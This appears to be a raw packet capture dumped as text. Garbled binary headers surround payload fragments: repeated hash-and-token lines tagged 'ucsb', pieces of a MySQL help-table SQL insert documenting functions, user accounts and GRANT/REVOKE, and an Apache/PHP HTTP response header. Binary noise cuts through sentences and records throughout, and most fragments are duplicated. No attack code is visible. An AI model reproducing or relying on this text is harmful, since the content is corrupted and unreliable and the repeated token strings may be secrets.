99D26E58F794A6A4E3F8E8B171C75C8E,ucsb,MTNzEwEDA4zE5renH8W7lxtLlnCt05kePDLaGQ==
4FCA1567129D1F827EAD7F3DC3B432AE,ucsb,MTNzEwEDA43BMkiMLKfUVhOOrLfqpvNN49NoNw==
11B2D972BA428FF16CA85455F4C0B183,ucsb,MTNzEwEDA44OJnKLhCuGAw/zsSaAC9Yu63W5tw==
4BD48AFAEB4CC990FEC410F023B84B54,ucsb,MTNzEwEDA4/YnjqjV5RH0d9VUVFyNNk3Z47NXA==
D59ED0AA4C744348E292866F90F27388,ucsb,MTNzEwEDA5BWYbbMEa14tybiTECX/ bb0`BiET@/o0AE<|!@@  PeZ>ſ̀ _ _c41330BC9562,ucsb,MTNzEwEDA4HVUZpPOYnWlygfxc9auzlvwnUgaw==
F04F86BC78D726A1AF9F157FB8902D01,ucsb,MTNzEwEDA4IZ9iabTQIpLM5RkcAeZMlO/fuw/g==
B37716126516262121E2004B26B2F8CF,ucsb,MTNzEwEDA4PBZh+OXalQm2yRIYwUlRb/f0AYSg==
3E24909B7756DEFA25AA6D4CD5905029,ucsb,MTNzEwEDA4R6stgU/HwT7IiU/ychzHjwEs/IKA==
0C733DB7EA8F30279BFBAD7F6D66D799,ucsb,MTNzEwEDA4XkNyGW6OsICxh+EpnFa/C6WuCLBA==
79BBD521E19D71C77C3D3B05A170B7FB,ucsb,MTNzEwEDA4ZlFK+Tv3gc1oCO/ofQtUcpwXXZ1A==
EFABDF3BD20A8B30EC315AC2BBCC535E,ucsb,MTNzEwEDA4dgnXk7SIQn0ckU2X5J0vB/hgtMVQ==
33CE7EC9BB4A79B68A98C09A6CA479E0,ucsb,MTNzEwEDA4gaGmk/X1AUGLHotma0Oi+qLNQ7Xg==
430CF401E14E8CDEB29082362E25E5D1,ucsb,MTNzEwEDA4luaAc17m9noTWuwzlwPlk2za5JwA==
CC33EEDE3633F92525C327610C4AA38B,ucsb,MTNzEwEDA4q7ZWsqeMl184w1TJYXqsM6Yh6e5w==
7F55A4704D930D2C1E017F3E1D350D83,ucsb,MTNzEwEDA4uPQzznRrzShHVCMHuhT55NgEWH3w==
99D26E58F794A6A4E3F8E8B171C75C8E,ucsb,MTNzEwEDA4zE5renH8W7lxtLlnCt05kePDLaGQ==
4FCA1567129D1F827EAD7F3DC3B432AE,ucsb,MTNzEwEDA43BMkiMLKfUVhOOrLfqpvNN49NoNw==
11B2D972BA428FF16CA85455F4C0B183,ucsb,MTNzEwEDA44OJnKLhCuGAw/zsSaAC9Yu63W5tw==
4BD48AFAEB4CC990FEC410F023B84B54,ucsb,MTNzEwEDA4/YnjqjV5RH0d9VUVFyNNk3Z47NXA==
D59ED0AA4C744348E292866F90F27388,ucsb,MTNzEwEDA5BWYbbMEa14tybiTEC)2 bbBi0`ET@/p܂Ao0E<6@?  3P,۟ a @),ented.\n','',''),(40,'LINEFROMTEXT',3,' LineFromText(wkt[,srid])\n LineStringFromText(wkt[,srid])\nConstructs a LINESTRING value using its WKT representation and SRID.\n','',''),(41,'SHOW MASTER STATUS',6,'SHOW MASTER STATUS\n\nProvides status information on the binary log files of the master.\n','',''),(42,'ADDTIME',14,' ADDTIME(expr,expr2)\n\n\nADDTIME() adds expr2 to expr and returns the result.\nexpr is a time or datetime expression, and expr2 is a time\nexpression.\n','mysql> SELECT ADDTIME(\'1997-12-31 23:59:59.999999\',\n -> \'1 1:1:1.000002\');\n -> \'1998-01-02 01:01:01.000001\'\nmysql> SELECT ADDTIME(\'01:00:00.999999\', \'02:00:00.999998\');\n -> \'03:00:01.999997\'',''),(43,'SPATIAL',24,'MySQL can create spatial indexes using syntax similar to that for creating\nregular indexes, but extended with the SPATIAL keyword.\nSpatial columns that are indexed currently must be declared NOT NULL.\nThe following examples demonstrate how to create spatial indexes.\n\n\n With CREATE TABLE:\n\nmysql> CREATE TABLE geom (g GEOMETRY NOT NULL, SPATIAL INDEX(g));\n\n With ALTER TABLE:\n\nmysql> ALTER TABLE geom ADD SPATIAL INDEX(g);\n\n With CREATE INDEX:\n\nmysql> CREATE SPATIAL INDEX sp_index ON geom (g);\n\n\nTo drop spatial indC32 bbBi0`ET@/ԂSŀo0E<`@?3 3 P\ )<CK2 bb0`BiET@/Ԁo0SE<6@@  3P,۟ a @),ented.\n','',''),(40,'LINEFROMTEXT',3,' LineFromText(wkt[,srid])\n LineStringFromText(wkt[,srid])\nConstructs a LINESTRING value using its WKT representation and SRID.\n','',''),(41,'SHOW MASTER STATUS',6,'SHOW MASTER STATUS\n\nProvides status information on the binary log files of the master.\n','',''),(42,'ADDTIME',14,' ADDTIME(expr,expr2)\n\n\nADDTIME() adds expr2 to expr and returns the result.\nexpr is a time or datetime expression, and expr2 is a time\nexpression.\n','mysql> SELECT ADDTIME(\'1997-12-31 23:59:59.999999\',\n -> \'1 1:1:1.000002\');\n -> \'1998-01-02 01:01:01.000001\'\nmysql> SELECT ADDTIME(\'01:00:00.999999\', \'02:00:00.999998\');\n -> \'03:00:01.999997\'',''),(43,'SPATIAL',24,'MySQL can create spatial indexes using syntax similar to that for creating\nregular indexes, but extended with the SPATIAL keyword.\nSpatial columns that are indexed currently must be declared NOT NULL.\nThe following examples demonstrate how to create spatial indexes.\n\n\n With CREATE TABLE:\n\nmysql> CREATE TABLE geom (g GEOMETRY NOT NULL, SPATIAL INDEX(g));\n\n With ALTER TABLE:\n\nmysql> ALTER TABLE geom ADD SPATIAL INDEX(g);\n\n With CREATE INDEX:\n\nmysql> CREATE SPATIAL INDEX sp_index ON geom (g);\n\n\nTo drop spatial indCb2 bb0`BiET@/g܀o0AE<`@@2 3 P\z )<C{9 bbBi0`ET@/p܂Ao0E<6@?  3P1  B),exes, use ALTER TABLE or DROP INDEX:\n\n\n With ALTER TABLE:\n\nmysql> ALTER TABLE geom DROP INDEX g;\n\n With DROP INDEX:\n\nmysql> DROP INDEX sp_index ON geom;\n\n\nExample: Suppose that a table geom contains more than 32,000 geometries,\nwhich are stored in the column g of type GEOMETRY.\nThe table also has an AUTO_INCREMENT column fid for storing\nobject ID values.\n','',''),(44,'TIMESTAMPDIFF',14,' TIMESTAMPDIFF(interval,datetime_expr1,datetime_expr2)\n\nReturns the integer difference between the date or datetime expressions\ndatetime_expr1 and\ndatetime_expr2. The unit for the result is given by the\ninterval argument. The legal values for interval are the same as\nthose listed in the description of the TIMESTAMPADD() function.\n','',''),(45,'UPPER',23,' UPPER(str)\nReturns the string str with all characters changed to uppercase\naccording to the current character set mapping (the default is ISO-8859-1\nLatin1).\n','mysql> SELECT UPPER(\'Hej\');\n -> \'HEJ\'',''),(46,'FROM_UNIXTIME',14,' FROM_UNIXTIME(unix_timestamp)\n FROM_UNIXTIME(unix_timestamp,format)\nReturns a representation of the unix_timestamp argument as a value in\n\'YYYY-MM-DD HH:MM:SS\' or YYYYMMDDHHMMSS format, depending on\nwhether the function is used in a string or numeric conC9 bb0`BiET@/Ԁo0SE<6@@  3P1  B),exes, use ALTER TABLE or DROP INDEX:\n\n\n With ALTER TABLE:\n\nmysql> ALTER TABLE geom DROP INDEX g;\n\n With DROP INDEX:\n\nmysql> DROP INDEX sp_index ON geom;\n\n\nExample: Suppose that a table geom contains more than 32,000 geometries,\nwhich are stored in the column g of type GEOMETRY.\nThe table also has an AUTO_INCREMENT column fid for storing\nobject ID values.\n','',''),(44,'TIMESTAMPDIFF',14,' TIMESTAMPDIFF(interval,datetime_expr1,datetime_expr2)\n\nReturns the integer difference between the date or datetime expressions\ndatetime_expr1 and\ndatetime_expr2. The unit for the result is given by the\ninterval argument. The legal values for interval are the same as\nthose listed in the description of the TIMESTAMPADD() function.\n','',''),(45,'UPPER',23,' UPPER(str)\nReturns the string str with all characters changed to uppercase\naccording to the current character set mapping (the default is ISO-8859-1\nLatin1).\n','mysql> SELECT UPPER(\'Hej\');\n -> \'HEJ\'',''),(46,'FROM_UNIXTIME',14,' FROM_UNIXTIME(unix_timestamp)\n FROM_UNIXTIME(unix_timestamp,format)\nReturns a representation of the unix_timestamp argument as a value in\n\'YYYY-MM-DD HH:MM:SS\' or YYYYMMDDHHMMSS format, depending on\nwhether the function is used in a string or numeric conCn; ZZBi0`EL@/܂Sŀo0E4Ti@? 3 Ptj$3"l7 )=C; ZZ0`BiEL@/go0AE4Ti@@ 3 Ptj$3"l7 )=Ch< ZZBi0`EL@/܂Sŀo0E4Tk@? 3 Ptj);"l2 )=C< ZZ0`BiEL@/go0AE4Tk@@ 3 Ptj);"l2 )=C\> bbBi0`ET@/p܂Ao0E<6@?  3P6  B),text.\n\nmysql> SELECT FROM_UNIXTIME(875996580);\n -> \'1997-10-04 22:23:00\'\nmysql> SELECT FROM_UNIXTIME(875996580) + 0;\n -> 19971004222300\n\nIf format is given, the result is formatted according to the\nformat string. format may contain the same specifiers as\nthose listed in the entry for the DATE_FORMAT() function.\n','mysql> SELECT FROM_UNIXTIME(UNIX_TIMESTAMP(),\n -> \'%Y %D %M %h:%i:%s %x\');\n -> \'2003 6th August 06:22:58 2003\'',''),(47,'MEDIUMBLOB',1,' MEDIUMBLOB\n\nA BLOB column with a maximum length of 16,777,215\n(2^24 - 1) bytes.\n','',''),(48,'IFNULL',9,' IFNULL(expr1,expr2)\nIf expr1 is not NULL, IFNULL() returns expr1,\nelse it returns expr2. IFNULL() returns a numeric or string\nvalue, depending on the context in which it is used.\n','mysql> SELECT IFNULL(1,0);\n -> 1\nmysql> SELECT IFNULL(NULL,10);\n -> 10\nmysql> SELECT IFNULL(1/0,10);\n -> 10\nmysql> SELECT IFNULL(1/0,\'yes\');\n -> \'yes\'',''),(49,'LEAST',26,' LEAST(value1,value2,...)\nWith two or more arguments, returns the smallest (minimum-valued) argument.\nThe arguments are compared using the following rules.\n\n --- If the return value is used in an INTEGER context or all arguments\nare integer-valued, theyCe> ZZBi0`EL@/܂Sŀo0E4Tm@? 3 Ptj.C"l- )=C~> bb0`BiET@/Ԁo0SE<6@@  3P6  B),text.\n\nmysql> SELECT FROM_UNIXTIME(875996580);\n -> \'1997-10-04 22:23:00\'\nmysql> SELECT FROM_UNIXTIME(875996580) + 0;\n -> 19971004222300\n\nIf format is given, the result is formatted according to the\nformat string. format may contain the same specifiers as\nthose listed in the entry for the DATE_FORMAT() function.\n','mysql> SELECT FROM_UNIXTIME(UNIX_TIMESTAMP(),\n -> \'%Y %D %M %h:%i:%s %x\');\n -> \'2003 6th August 06:22:58 2003\'',''),(47,'MEDIUMBLOB',1,' MEDIUMBLOB\n\nA BLOB column with a maximum length of 16,777,215\n(2^24 - 1) bytes.\n','',''),(48,'IFNULL',9,' IFNULL(expr1,expr2)\nIf expr1 is not NULL, IFNULL() returns expr1,\nelse it returns expr2. IFNULL() returns a numeric or string\nvalue, depending on the context in which it is used.\n','mysql> SELECT IFNULL(1,0);\n -> 1\nmysql> SELECT IFNULL(NULL,10);\n -> 10\nmysql> SELECT IFNULL(1/0,10);\n -> 10\nmysql> SELECT IFNULL(1/0,\'yes\');\n -> \'yes\'',''),(49,'LEAST',26,' LEAST(value1,value2,...)\nWith two or more arguments, returns the smallest (minimum-valued) argument.\nThe arguments are compared using the following rules.\n\n --- If the return value is used in an INTEGER context or all arguments\nare integer-valued, theyC> ZZ0`BiEL@/go0AE4Tm@@ 3 Ptj.C"l- )=CCB ZZBi0`EL@/܂Sŀo0E4To@? 3 Ptj3K"l( )=C\B ZZ0`BiEL@/go0AE4To@@ 3 Ptj3K"l( )=C6D bbBi0`ET@/p܂Ao0E<6@?  3P;  J), are compared as integers.\n\n --- If the return value is used in a REAL context or all arguments are\nreal-valued, they are compared as reals.\n\n --- If any argument is a case-sensitive string, the arguments are compared\nas case-sensitive strings.\n\n --- In other cases, the arguments are compared as case-insensitive strings.\n','mysql> SELECT LEAST(2,0);\n -> 0\nmysql> SELECT LEAST(34.0,3.0,5.0,767.0);\n -> 3.0\nmysql> SELECT LEAST(\'B\',\'A\',\'C\');\n -> \'A\'',''),(50,'=',26,' =\nEqual:\n','mysql> SELECT 1 = 0;\n -> 0\nmysql> SELECT \'0\' = 0;\n -> 1\nmysql> SELECT \'0.0\' = 0;\n -> 1\nmysql> SELECT \'0.01\' = 0;\n -> 0\nmysql> SELECT \'.01\' = 0.01;\n -> 1',''),(51,'REVERSE',23,' REVERSE(str)\nReturns the string str with the order of the characters reversed.\n','mysql> SELECT REVERSE(\'abc\');\n -> \'cba\'',''),(52,'ISNULL',26,' ISNULL(expr)\nIf expr is NULL, ISNULL() returns 1, otherwise\nit returns 0.\n','mysql> SELECT ISNULL(1+1);\n -> 0\nmysql> SELECT ISNULL(1/0);\n -> 1',''),(53,'BINARY',1,' BINARY(M)\n\nThe BINARY type is similar to the CHAR type, but stores\nbinary byte strings rather than non-binary character strings.\n\nThis type was added in MySQL 4.1.2.\n','',''),(5CQD bb0`BiET@/Ԁo0SE<6@@  3P;  J), are compared as integers.\n\n --- If the return value is used in a REAL context or all arguments are\nreal-valued, they are compared as reals.\n\n --- If any argument is a case-sensitive string, the arguments are compared\nas case-sensitive strings.\n\n --- In other cases, the arguments are compared as case-insensitive strings.\n','mysql> SELECT LEAST(2,0);\n -> 0\nmysql> SELECT LEAST(34.0,3.0,5.0,767.0);\n -> 3.0\nmysql> SELECT LEAST(\'B\',\'A\',\'C\');\n -> \'A\'',''),(50,'=',26,' =\nEqual:\n','mysql> SELECT 1 = 0;\n -> 0\nmysql> SELECT \'0\' = 0;\n -> 1\nmysql> SELECT \'0.0\' = 0;\n -> 1\nmysql> SELECT \'0.01\' = 0;\n -> 0\nmysql> SELECT \'.01\' = 0.01;\n -> 1',''),(51,'REVERSE',23,' REVERSE(str)\nReturns the string str with the order of the characters reversed.\n','mysql> SELECT REVERSE(\'abc\');\n -> \'cba\'',''),(52,'ISNULL',26,' ISNULL(expr)\nIf expr is NULL, ISNULL() returns 1, otherwise\nit returns 0.\n','mysql> SELECT ISNULL(1+1);\n -> 0\nmysql> SELECT ISNULL(1/0);\n -> 1',''),(53,'BINARY',1,' BINARY(M)\n\nThe BINARY type is similar to the CHAR type, but stores\nbinary byte strings rather than non-binary character strings.\n\nThis type was added in MySQL 4.1.2.\n','',''),(5CE bbBi0`ET@/أ  o0E<|"@?  PeZ>̀ l _cXq2YZT0e9GSQ==
7CF7908BCC76041A6CC22F402A00C80A,ucsb,MTNzEwEDA5E6DPG+zvW3C1R64Ldw7YY+uaU26w==
8D7CFD6E70069EE2D38AF4B9A7AF8F84,ucsb,MTNzEwEDA5LpDNzNpVGMJRSgYbvO9BZ0ehsfxA==
8F55138D61C4F29511ACB5F067A0B39D,ucsb,MTNzEwEDA5Mq0ZLGmkAelK1qAujGuw9t5p48LQ==
6E9CC189AA0E430BD1431E953E10CF15,ucsb,MTNzEwEDA5SlyZ/KKDk9sIR1G9sL8ah2K9z+TA==
461C2DF7FD2EBE280C5FD1811ADC393A,ucsb,MTNzEwEDA5WGF+MkfbOtsBs6TDZAJ0TXJq0bzQ==
692430DF5643F174B1E99D23B166A529,ucsb,MTNzEwEDA5aSnmESb6Bx1m4LF9ErGUMdHnYSwA==
1B337164609C6A26F158F9508CF191F5,ucsb,MTNzEwEDA5d8hG5x86vlEw01HfL/Sf67W/Y5hA==
471EA51FADD8A551CFE4CBD8A5F84E98,ucsb,MTNzEwEDA5iYnbcSXq7JtuVh8W3BuFU5x72JCQ==
FEE702B8DB03AB028DD5A72D087D922F,ucsb,MTNzEwEDA5kBJ3mNkYfT0cn7mhKgFtTnakUf+A==
3995C5AB66DE087955CF5970544B05E2,ucsb,MTNzEwEDA5oXeTVpcKuiTVUHhJSW92DpF2gOog==
3E3950428F18636E3FDAE9D05AD67B94,ucsb,MTNzEwEDA5tU1161KzYyMDV0762Kz5ng6Ur6CQ==
3A0E354DA7B465C15845F468A6E69EDA,ucsb,MTNzEwEDA5x7maW84JnWnd/kwulmnFj22RvpXw==
11A356FA0CF81369C9FFE82DFA68B662,ucsb,MTNzEwEDA51pEAS7FzjMNswuirvfXbAzwG7ykw==
13F3E03F4CBD9CB563A6A9D31786A290,ucsb,MTNzEwEDA55rcIH7gpCXo2Ay+8N05CQkHekE1Q==
368F78A83E6EF4D59C868A6D0D2FDF92,ucsb,MTNzEwEDA5+iHrvYbnjsVBR9ofQzj0ye0vSx2Q==
A291568A0283A27B4A163793CE ZZBi0`EL@/Ao0E4=@?  PXhqǸ&"k dvyČCE ZZBi0`EL@/܂Sŀo0E4Tq@? 3 Ptj8S"l# )>CE bb0`BiET@/o0AE<|"@@  PeZ>̀ l _cXq2YZT0e9GSQ==
7CF7908BCC76041A6CC22F402A00C80A,ucsb,MTNzEwEDA5E6DPG+zvW3C1R64Ldw7YY+uaU26w==
8D7CFD6E70069EE2D38AF4B9A7AF8F84,ucsb,MTNzEwEDA5LpDNzNpVGMJRSgYbvO9BZ0ehsfxA==
8F55138D61C4F29511ACB5F067A0B39D,ucsb,MTNzEwEDA5Mq0ZLGmkAelK1qAujGuw9t5p48LQ==
6E9CC189AA0E430BD1431E953E10CF15,ucsb,MTNzEwEDA5SlyZ/KKDk9sIR1G9sL8ah2K9z+TA==
461C2DF7FD2EBE280C5FD1811ADC393A,ucsb,MTNzEwEDA5WGF+MkfbOtsBs6TDZAJ0TXJq0bzQ==
692430DF5643F174B1E99D23B166A529,ucsb,MTNzEwEDA5aSnmESb6Bx1m4LF9ErGUMdHnYSwA==
1B337164609C6A26F158F9508CF191F5,ucsb,MTNzEwEDA5d8hG5x86vlEw01HfL/Sf67W/Y5hA==
471EA51FADD8A551CFE4CBD8A5F84E98,ucsb,MTNzEwEDA5iYnbcSXq7JtuVh8W3BuFU5x72JCQ==
FEE702B8DB03AB028DD5A72D087D922F,ucsb,MTNzEwEDA5kBJ3mNkYfT0cn7mhKgFtTnakUf+A==
3995C5AB66DE087955CF5970544B05E2,ucsb,MTNzEwEDA5oXeTVpcKuiTVUHhJSW92DpF2gOog==
3E3950428F18636E3FDAE9D05AD67B94,ucsb,MTNzEwEDA5tU1161KzYyMDV0762Kz5ng6Ur6CQ==
3A0E354DA7B465C15845F468A6E69EDA,ucsb,MTNzEwEDA5x7maW84JnWnd/kwulmnFj22RvpXw==
11A356FA0CF81369C9FFE82DFA68B662,ucsb,MTNzEwEDA51pEAS7FzjMNswuirvfXbAzwG7ykw==
13F3E03F4CBD9CB563A6A9D31786A290,ucsb,MTNzEwEDA55rcIH7gpCXo2Ay+8N05CQkHekE1Q==
368F78A83E6EF4D59C868A6D0D2FDF92,ucsb,MTNzEwEDA5+iHrvYbnjsVBR9ofQzj0ye0vSx2Q==
A291568A0283A27B4A163793CE ZZ0`BiEL@/Eo0lE4=@@  PXhqǸ&"k dvyČCE ZZ0`BiEL@/go0AE4Tq@@ 3 Ptj8S"l# )>CH bbBi0`ET@/p܂Ao0E<6@?  3P@ o J),4,'BOUNDARY',19,' Boundary(g)\nReturns a geometry that is the closure of the combinatorial boundary of the\ngeometry value g.\n','',''),(55,'CREATE USER',7,'The CREATE USER statement creates new MySQL accounts. To use it, you\nmust have the global CREATE USER privilege or the INSERT\nprivilege for the mysql database.\nFor each account, CREATE USER creates a new record in the\nmysql.user table that has no privileges. An error occurs if the\naccount already exists.\n\nThe account can be given a password with the optional IDENTIFIED\nBY clause. The user value and the password are given the same way\nas for the GRANT statement. In particular, to specify the password\nin plain text, omit the PASSWORD keyword. To specify the password\nas the hashed value as returned by the PASSWORD() function, include\nthe keyword PASSWORD.\nSee also : [GRANT, , GRANT].\n\nThe CREATE USER statement was added in MySQL 5.0.2.\n\n\n @subsubsection DROP USER Syntax\n\n\n\nDROP USER user [, user] ...\n\nThe DROP USER statement deletes one or more MySQL accounts.\nTo use it, you\nmust have the global CREATE USER privilege or the DELETE\nprivilege for the mysql database.\nEach account is named using the same format as for GRANT\nor REVOKE; for example, \'jeffrey\'@@\'localhost\'. The user CH bb0`BiET@/Ԁo0SE<6@@  3P@ o J),4,'BOUNDARY',19,' Boundary(g)\nReturns a geometry that is the closure of the combinatorial boundary of the\ngeometry value g.\n','',''),(55,'CREATE USER',7,'The CREATE USER statement creates new MySQL accounts. To use it, you\nmust have the global CREATE USER privilege or the INSERT\nprivilege for the mysql database.\nFor each account, CREATE USER creates a new record in the\nmysql.user table that has no privileges. An error occurs if the\naccount already exists.\n\nThe account can be given a password with the optional IDENTIFIED\nBY clause. The user value and the password are given the same way\nas for the GRANT statement. In particular, to specify the password\nin plain text, omit the PASSWORD keyword. To specify the password\nas the hashed value as returned by the PASSWORD() function, include\nthe keyword PASSWORD.\nSee also : [GRANT, , GRANT].\n\nThe CREATE USER statement was added in MySQL 5.0.2.\n\n\n @subsubsection DROP USER Syntax\n\n\n\nDROP USER user [, user] ...\n\nThe DROP USER statement deletes one or more MySQL accounts.\nTo use it, you\nmust have the global CREATE USER privilege or the DELETE\nprivilege for the mysql database.\nEach account is named using the same format as for GRANT\nor REVOKE; for example, \'jeffrey\'@@\'localhost\'. The user CJ VVBi0`EH@/:o+Po0E0&c@?m  PUGP6c `t6aGHTTP/1.1 200 OK Date: Sun, 09 Dec 2018 20:40:09 GMT Server: Apache/2.0.54 (Debian GNU/Linux) mod_python/3.1.3 Python/2.3.5 PHP/4.4.0-4 mod_perl/2.0.1 Perl/v5.8.7 X-Powered-By: PHP/4.4.0-4 Connection: close Content-Type: text/html C+J VV0`BiEH@/o0SE0&c@@m  PUGP6c `t6aGHTTP/1.1 200 OK Date: Sun, 09 Dec 2018 20:40:09 GMT Server: Apache/2.0.54 (Debian GNU/Linux) mod_python/3.1.3 Python/2.3.5 PHP/4.4.0-4 mod_perl/2.0.1 Perl/v5.8.7 X-Powered-By: PHP/4.4.0-4 Connection: close Content-Type: text/html CL bbBi0`ET@/p܂Ao0E<6@?  3PF = J)-and\nhost parts of the account name correspond to the User and Host\ncolumn values of the user table record for the account.\n\nDROP USER was added in MySQL 4.1.1 and originally removed only\naccounts that have no privileges. In MySQL 5.0.2, it was modified to also\nremove account privileges. This means that the procedure for removing an\naccount depends on your version of MySQL.\n\nAs of MySQL 5.0.2, remove an account and its privileges as follows:\n\nDROP USER user;\n\nThe statement removes privilege records for the account from all grant tables.\n\nFrom MySQL 4.1.1 to 5.0.1, DROP USER deletes only MySQL accounts that\ndon\'t have any privileges. In these MySQL versions, it serves only to remove\neach account record from the user table. To remove a MySQL account, you\nshould use the following procedure, performing the steps in the order shown:\n\n@enumerate\n --- Use SHOW GRANTS to determine what privileges the account has.\nSee also : [SHOW GRANTS, , SHOW GRANTS].\n --- Use REVOKE to revoke the privileges displayed by SHOW GRANTS.\nThis removes records for the account from all the grant tables except the\nuser table, and revokes any global privileges listed in the user\ntable.\nSee also : [GRANT, , GRANT].\n --- Delete the account by using DROP USER to remove tC M ZZBi0`EL@/܂Sŀo0E4Ts@? 3 Ptj=["l )>C M bb0`BiET@/Ԁo0SE<6@@  3PF = J)-and\nhost parts of the account name correspond to the User and Host\ncolumn values of the user table record for the account.\n\nDROP USER was added in MySQL 4.1.1 and originally removed only\naccounts that have no privileges. In MySQL 5.0.2, it was modified to also\nremove account privileges. This means that the procedure for removing an\naccount depends on your version of MySQL.\n\nAs of MySQL 5.0.2, remove an account and its privileges as follows:\n\nDROP USER user;\n\nThe statement removes privilege records for the account from all grant tables.\n\nFrom MySQL 4.1.1 to 5.0.1, DROP USER deletes only MySQL accounts that\ndon\'t have any privileges. In these MySQL versions, it serves only to remove\neach account record from the user table. To remove a MySQL account, you\nshould use the following procedure, performing the steps in the order shown:\n\n@enumerate\n --- Use SHOW GRANTS to determine what privileges the account has.\nSee also : [SHOW GRANTS, , SHOW GRANTS].\n --- Use REVOKE to revoke the privileges displayed by SHOW GRANTS.\nThis removes records for the account from all the grant tables except the\nuser table, and revokes any global privileges listed in the user\ntable.\nSee also : [GRANT, , GRANT].\n --- Delete the account by using DROP USER to remove tC1M ZZ0`BiEL@/go0AE4Ts@@ 3 Ptj=["l )>CwN NNBi0`E@@/Plo0E(‰@# s P=.ZLPfCN NNʪBiE@@/#o0o0oE(‰@@b s P=.ZLPfCN ZZBi0`EL@/Ao0E4=@?  PXhqX܀&"` dyyƌCN ZZ0`BiEL@/Eo0lE4=@@  PXhqX܀&"` dyyƌCN NNBi0`E@@/Plo0E(Œ@# s P=.ZLPfCN NNʪBiE@@/#o0o0oE(Œ@@b s P=.ZLPfCpO ZZBi0`EL@/܂Sŀo0E4Tu@? 3 PtjBc"l )>CO ZZ0`BiEL@/go0AE4Tu@@ 3 PtjBc"l )>CP bbBi0`ET@/p܂Ao0E<6@?  3PK  : J)-he user table\nrecord.\n@end enumerate\n\nDROP USER does not automatically close any open user sessions. Rather, in\nthe event that a user with an open session is dropped, the command does not take\neffect until that user\'s session is closed. Once the session is closed, the user\nis dropped, and that user\'s next attempt to log in will fail. This is by design.\n\nBefore MySQL 4.1.1, DROP USER is not available. You should first\nrevoke the account privileges as just described. Then delete the user\ntable record and flush the grant tables like this:\n\nmysql> DELETE FROM mysql.user\n -> WHERE User=\'user_name\' and Host=\'host_name\';\nmysql> FLUSH PRIVILEGES;\n\n\n @subsubsection GRANT and REVOKE Syntax\n\n\n\n\nGRANT priv_type [(column_list)] [, priv_type [(column_list)]] ...\n ON [object_type] {tbl_name | * | *.* | db_name.*}\n TO user [IDENTIFIED BY [PASSWORD] \'password\']\n [, user [IDENTIFIED BY [PASSWORD] \'password\']] ...\n [REQUIRE\n NONE |\n [{SSL| X509}]\n [CIPHER \'cipher\' [AND]]\n [ISSUER \'issuer\' [AND]]\n [SUBJECT \'subject\']]\n [WITH with_option [with_option] ...]\n\nobject_type =\n TABLE\n | FUNCTION\n | PROCEDURE\n\nwith_option =\n GRANT OPTION\n | MAX_QUERIES_PER_HOUR count\n |CP NNBiʪE@@/#o0oo0E(@@n sPZLӾ=/P C Q bb0`BiET@/Ԁo0SE<6@@  3PK  : J)-he user table\nrecord.\n@end enumerate\n\nDROP USER does not automatically close any open user sessions. Rather, in\nthe event that a user with an open session is dropped, the command does not take\neffect until that user\'s session is closed. Once the session is closed, the user\nis dropped, and that user\'s next attempt to log in will fail. This is by design.\n\nBefore MySQL 4.1.1, DROP USER is not available. You should first\nrevoke the account privileges as just described. Then delete the user\ntable record and flush the grant tables like this:\n\nmysql> DELETE FROM mysql.user\n -> WHERE User=\'user_name\' and Host=\'host_name\';\nmysql> FLUSH PRIVILEGES;\n\n\n @subsubsection GRANT and REVOKE Syntax\n\n\n\n\nGRANT priv_type [(column_list)] [, priv_type [(column_list)]] ...\n ON [object_type] {tbl_name | * | *.* | db_name.*}\n TO user [IDENTIFIED BY [PASSWORD] \'password\']\n [, user [IDENTIFIED BY [PASSWORD] \'password\']] ...\n [REQUIRE\n NONE |\n [{SSL| X509}]\n [CIPHER \'cipher\' [AND]]\n [ISSUER \'issuer\' [AND]]\n [SUBJECT \'subject\']]\n [WITH with_option [with_option] ...]\n\nobject_type =\n TABLE\n | FUNCTION\n | PROCEDURE\n\nwith_option =\n GRANT OPTION\n | MAX_QUERIES_PER_HOUR count\n |CQ NN0`BiE@@/Eo0lE(@@n sPZLӾ=/P CR ZZBi0`EL@/Ao0E4"@?H  PPZ߀"lS dz^CR ZZ0`BiEL@/o0  E4"@@G  PPZ߀"lS dz^CKU bbBi0`ET@/p܂Ao0E<6@?  3PP  J)- MAX_UPDATES_PER_HOUR count\n | MAX_CONNECTIONS_PER_HOUR count\n | MAX_USER_CONNECTIONS count\n\nREVOKE priv_type [(column_list)] [, priv_type [(column_list)]] ...\n ON [object_type] {tbl_name | * | *.* | db_name.*}\n FROM user [, user] ...\n\nREVOKE ALL PRIVILEGES, GRANT OPTION FROM user [, user] ...\n\n\nThe GRANT and REVOKE statements allow system administrators to\ncreate MySQL user accounts and to grant rights to and revoke them from\naccounts. GRANT and REVOKE are implemented in MySQL 3.22.11\nor later. For earlier MySQL versions, these statements do nothing.\n\nMySQL account information is stored in the tables of the mysql\ndatabase. This database and the access control system are discussed\nextensively in [MySQL Database Administration], which you should consult\nfor additional details.\n\nIf the grant tables contain privilege records that contain mixed-case\ndatabase or table names and the lower_case_table_names system\nvariable is set, REVOKE cannot be used to revoke the privileges. It\nwill be necessary to manipulate the grant tables directly. (GRANT\nwill not create such records when lower_case_table_names is set,\nbut such records might have been created prior to setting the variable.)\n\nPrivileges can be granted at several levels:\n\n Global CeU bb0`BiET@/Ԁo0SE<6@@  3PP  J)- MAX_UPDATES_PER_HOUR count\n | MAX_CONNECTIONS_PER_HOUR count\n | MAX_USER_CONNECTIONS count\n\nREVOKE priv_type [(column_list)] [, priv_type [(column_list)]] ...\n ON [object_type] {tbl_name | * | *.* | db_name.*}\n FROM user [, user] ...\n\nREVOKE ALL PRIVILEGES, GRANT OPTION FROM user [, user] ...\n\n\nThe GRANT and REVOKE statements allow system administrators to\ncreate MySQL user accounts and to grant rights to and revoke them from\naccounts. GRANT and REVOKE are implemented in MySQL 3.22.11\nor later. For earlier MySQL versions, these statements do nothing.\n\nMySQL account information is stored in the tables of the mysql\ndatabase. This database and the access control system are discussed\nextensively in [MySQL Database Administration], which you should consult\nfor additional details.\n\nIf the grant tables contain privilege records that contain mixed-case\ndatabase or table names and the lower_case_table_names system\nvariable is set, REVOKE cannot be used to revoke the privileges. It\nwill be necessary to manipulate the grant tables directly. (GRANT\nwill not create such records when lower_case_table_names is set,\nbut such records might have been created prior to setting the variable.)\n\nPrivileges can be granted at several levels:\n\n Global CY bbBi0`ET@/p܂Ao0E<6@?  3PU = J).level\nGlobal privileges apply to all databases on a given server. These privileges\nare stored in the mysql.user table.\nGRANT ALL ON *.* and\nREVOKE ALL ON *.* grant and revoke only global privileges.\n\n Database level\nDatabase privileges apply to all objects in a given database. These privileges\nare stored in the mysql.db and mysql.host tables.\nGRANT ALL ON db_name.* and\nREVOKE 